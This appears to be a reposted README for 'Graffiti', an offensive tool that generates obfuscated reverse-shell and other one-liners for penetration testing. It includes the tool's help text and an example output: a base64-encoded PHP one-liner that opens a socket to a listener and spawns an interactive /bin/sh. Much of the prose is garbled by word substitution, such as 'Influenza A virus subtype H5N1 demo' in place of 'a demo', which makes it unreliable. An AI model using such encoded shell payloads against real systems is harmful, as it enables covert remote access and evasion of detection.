Graffiti - A Tool To Generate Obfuscated I Liners To Assistance Inward Penetration Testing
Graffiti is a tool to generate obfuscated oneliners to assistance inwards penetration testing situations. Graffiti accepts the next languages for encoding:
- Python
- Perl
- Batch
- Powershell
- PHP
- Bash
Features
Graffiti comes consummate alongside a database that volition insert each encoded payload into it, inwards guild to allow terminate users to persuasion already created payloads for hereafter use. The payloads tin hold out encoded using the next techniques:
- Xor
- Base64
- Hex
- ROT13
- Raw
- Terminal drib inwards access, alongside the might to run external commands
- Ability to practice your ain payload JSON files
- Ability to persuasion cached payloads within of the database
- Ability to run the database inwards retentiveness for quick deletion
- Terminal history together with saving of concluding history
- Auto tab completion within of terminal
- Ability to securely wipe the history files together with database file
- Multiple encoding techniques equally mentioned above
Usage
Graffiti comes alongside a builtin terminal, when yous move yesteryear no flags to the computer program it volition drib into the terminal. The concluding has history, the might to run external commands, together with it's ain internal commands. In guild to become help, yous jsut stimulate got to type
help or ?: ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__| / \ __\_ __ \__ \\ __\\ __\| \ __\ | \ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/ v(0.1) no arguments stimulate got been passed, dropping into concluding type `help/?` to become help, all commands that sit down within of `/bin` are available inwards the concluding root@graffiti: /graffiti# ? Command Description --------- -------------- help/? Show this assist external List available external commands cached Display all payloads that are already inwards the database list/show List all available payloads search Search for a specific payload purpose Use this payload together with encode it using a specified coder information Get information on a specified payload cheque Check for updates history Display ascendancy history exit/quit Exit the concluding together with running session encode Encode a provided payload root@graffiti: /graffiti# assist Command Description --------- -------------- help/? Show this assist external List available external commands cached Display all payloads that are already inwards the database list/show List all available payloads search Search for a specific payload purpose Use this payload together with encode it using a specified coder information Get information on a specified payload cheque Check for updates history Display ascendancy history exit/quit Exit the concluding together with running session encode Encode a provided payload usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]] optional arguments: -h, --help demo this assist message together with choke -c CODEC, --codec CODEC specify an encoding technique (*default=None) -p PAYLOAD, --payload PAYLOAD move yesteryear the path to a payload to purpose (*default=None) --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS practice a payload file together with shop it within of ./etc/payloads (*default=None) -l, --list listing all available payloads yesteryear path (*default=False) -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]] move yesteryear your ain personal payload to purpose for the encoding (*default=None) -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS move yesteryear a listening address to purpose for the payload (if needed) (*default=None) -lP LISTENING-PORT, --lport LISTENING-PORT move yesteryear a listening port to purpose for the payload (if needed) (*default=None) -u URL, --url URL move yesteryear a URL if needed yesteryear your payload (*default=None) -vC, --view-cached persuasion the cached information already acquaint within of the database -H, --no-history practice non shop the ascendancy history (*default=True) -W, --wipe wipe the database together with the history (*default=False) --memory initialize the database into retentiveness instead of a .db file (*default=False) -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...] move yesteryear to a greater extent than external commands, this volition allow them to hold out accessed within of the concluding commands must hold out inwards your PATH (*default=None)root@graffiti: /graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065 Encoded Payload: -------------------------------------------------- php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));' --------------------------------------------------Influenza A virus subtype H5N1 demo of Graffiti tin hold out flora here:
Installation
On whatsoever Linux, Mac, or Windows system, Graffiti should run out of the box without the postulate to install whatsoever external packages. If yous would similar to install Graffiti equally an executable onto your arrangement (you must hold out running either Linux or Mac for it to run successfully), all yous stimulate got to practice is the following:
./install.shBugs together with issues
If yous tumble out to uncovering a põrnikas or an issue, delight practice an termination alongside details here together with give thank yous you ahead of time!
